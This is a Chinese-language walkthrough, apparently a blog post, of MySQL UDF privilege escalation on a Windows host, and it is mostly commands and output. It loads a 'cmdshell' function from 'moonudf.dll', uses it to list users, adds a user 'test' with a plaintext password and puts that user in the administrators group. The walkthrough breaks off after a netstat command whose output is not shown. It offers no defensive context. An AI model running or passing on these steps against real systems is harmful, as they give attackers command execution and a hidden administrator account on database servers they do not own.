1、创建cmdshell:
mysql> create function cmdshell returns string soname 'moonudf.dll';
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

Query OK, 0 rows affected (0.25 sec)

2、查看用户信息:
mysql> select cmdshell('net user');
+-----------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------+
| cmdshell('net user')

                                                                             |
+-----------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------+
|
\\ 的用户帐户

-------------------------------------------------------------------------------
Administrator            ASPNET                   Guest
HelpAssistant            IUSR_PC-201202111331     IWAM_PC-201202111331
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。


--------------------------------------------完成!
 |
+-----------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------+
1 row in set (0.22 sec)

3、添加用户信息:
mysql> select cmdshell('net user test w321321 /add');
+-------------------------------------------------------------------------+
| cmdshell('net user test w321321 /add')                                  |
+-------------------------------------------------------------------------+
| 命令成功完成。


--------------------------------------------完成!
 |
+-------------------------------------------------------------------------+
1 row in set (0.36 sec)


4、添加用户到管理组:

mysql> select cmdshell('net localgroup administrators test /add ');
+-------------------------------------------------------------------------+
| cmdshell('net localgroup administrators test /add ')                    |
+-------------------------------------------------------------------------+
| 命令成功完成。


--------------------------------------------完成!
 |
+-------------------------------------------------------------------------+
1 row in set (0.22 sec)
测试结果:
MYSQL-提权


5、查看端口:
mysql> select cmdshell('netstat -an');